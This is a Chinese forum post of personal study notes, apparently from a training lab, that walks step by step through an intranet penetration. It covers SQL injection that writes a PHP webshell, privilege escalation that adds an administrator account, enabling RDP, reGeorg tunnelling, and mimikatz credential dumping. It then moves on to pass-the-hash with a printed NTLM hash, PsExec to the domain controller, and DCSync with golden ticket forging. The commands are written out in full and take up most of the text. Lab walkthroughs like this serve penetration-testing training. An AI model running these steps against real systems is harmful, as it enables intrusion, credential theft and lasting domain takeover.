关于内网渗透

zxl1005   ·   发表于 2022-09-05 16:40:39   ·   学习杂记

此帖子仅为记录个人学习记录

打开我们的猫舍靶场
id=1 and 1=1 和id=1 and 1=6 回显不同
说明有SQL注入
然后输入
id=1 order by 2 /order by 3
判断出存在两个字段
id=1 and 1=2 union select 1,2
判断出显错位是第二个字段
那么现在我们来利用SQL注入和数据库语句构建一句话木马
获得webshell
id=1 union select 1,’ into outfile
‘’C:\phpStudy\WWW\zzz.php’
这里注意转义符转义
文件路径利用报错信息获得
拿到webshell 用蚁剑或者菜刀连接登陆
上传烂土豆,利用烂土豆进行提权
改名为414.exe
打开终端
创建用户
414.exe -p “net user zzz A1B2C3!.Qa /add “
把创建的用户提升到管理组
414.exe -p “net localgroup administrators zzz /add “
然后进行远程连接
查看端口开启情况
netstat -ano
如果3389没有开启
可以通过以下命令开启
REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /fmService

开启端口3389后,输入systeminfo 查看电脑配置
这里是sever 2008r2
如果远程连接猫舍的话是2003 明显不是一台主机。
因为我们访问不到内网,所以构建PHP文件中转,访问PHP文件,PHP文件访问主机
利用reGeorg ,上传一个php文件,在浏览器里进行访问
出现Georg says, ‘All seems fine’就是成功
然后在reGeorg目录下CMD
输入reGeorgSocksProxy.py -l 127.0.0.1 -p 10086 -u http://*.*.cn/777.php
聂老师是
py -2 reGeorgSocksProxy.py -l 127.0.0.1 -p 10086 -u http://*.*.cn/777.php
然后打开Proxifier
设置代理和代理规则

在蚁剑终端输入ipconfig ,得到内网地址10.0.1.4
直接win+R,mstsc连接,用上文注册的账号密码进行连接


然后利用猕猴桃获取明文账号密码,注意 sever2012以上的版本都自带补丁
需要做哈希,这里先不用
输入privilege::debug 提升权限
log 生成日志记录
sekurlsa::logonpasswords 抓取密码
然后远程登录10.0.1.8
账号密码用猕猴桃得到的Administrator 密码woshifengge1.
得到flag.txt

顺便查一下systeminfo 看见域控是zkaq.cn


在10.0.1.8里面,用猕猴桃抓取ntml值
administrator的值为61465a991b168727b65b3644aab823cd
输入 sekurlsa::pth /user:administrator /domain:”zkaq.cn” / ntlm:61465a991b168727b65b3644aab823cd
然后再本地cmd下输入\dc.zkqa.cn\c$ =》去读远程的C盘的内容 dc.zkaq.cn
就可以登录成功,访问
在猕猴桃进行哈希传递之前,是登陆不成功的
通过PsExec.exe
cd ../跳到C:\Windows 在cd.. 到C:\然后 cd users 再cd administrator
在cd desktop 然后输入PsExec.exe \dc.zkaq.cn cmd
然后就会弹出域控的cmd
net user zzz A1B2C3!.Qa /add
net localgroup administrators zzz /add
然后远程连接10.0.1.6


但是如果域控的密码被修改了,就用不了哈希传递了
那么我们可以用黄金票据长久控制,拿到票据就无所谓密码的修改与否了
这里依然要用到我们的猕猴桃
命令为:lsadump::dcsync /user:krbtgt 获取krbtgt【mimikatz会模拟域控,向目标域控请求账号密码信息】
提取出里面的sid和hashNTLM Sid里的-502不要


Sid值为S-1-5-21-4098506371-3349406080-1400905760
hashNTLM:9f7afad7acc9f72b7e338b908795b7d

制作票据
kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-4098506371-3349406080-1400905760 /krbtgt:9f7afad7acc9f72b7e338b908795b7d /ticket:administrator.kiribi

加载票据kerberos::ptt administrator.kiribi

cmd命令则在10.0.1.8拿到域控权限的时候
通过cd..和cd命令到desktop
比如 cd User 然后 cd zzz 然后cd desktop
然后misikatz.exe运行
正常提权输入后续命令就可以了

打赏我,让我更有动力~

0 条回复   |  直到 2022-9-5 | 650 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.